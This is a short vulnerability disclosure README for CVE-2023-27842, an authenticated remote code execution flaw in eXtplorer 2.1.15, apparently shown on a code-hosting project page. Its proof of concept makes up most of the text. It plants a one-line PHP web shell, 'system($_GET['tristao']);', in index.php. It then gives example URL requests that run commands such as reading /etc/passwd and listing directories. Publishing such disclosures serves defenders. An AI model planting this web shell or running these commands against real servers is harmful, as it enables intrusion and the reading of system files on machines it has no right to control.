Projects STRLCPY CVE-2023-27842 Files
🤬
Enable build support by adding .buildspec.yml
README.md Loading last commit info...
README.md

Title: eXtplorer 2.1.15 – Insecure Permissions following Remote Code Execution (Authenticated)
Date: 2022-11-09
Author: Francisco Marinho
Vendor Homepage: http://extplorer.net/
Software Link: http://extplorer.net/attachments/download/99/eXtplorer_2.1.15.zip
Version: 2.1.15
Tested on: Linux
==========> POC <==========

1- Login with your account
2- Access the directory /index.php
3- Edit index.php, adding “system($_GET[‘tristao’]);” on line two.
4- Acess homepage index.php
Examples:
cat /etc/passwd
/index.php?tristao=cat%20%20/etc/passwd
cat ls -la
/index.php?tristao=ls%20-la

Please wait...
Page is in error, reload to recover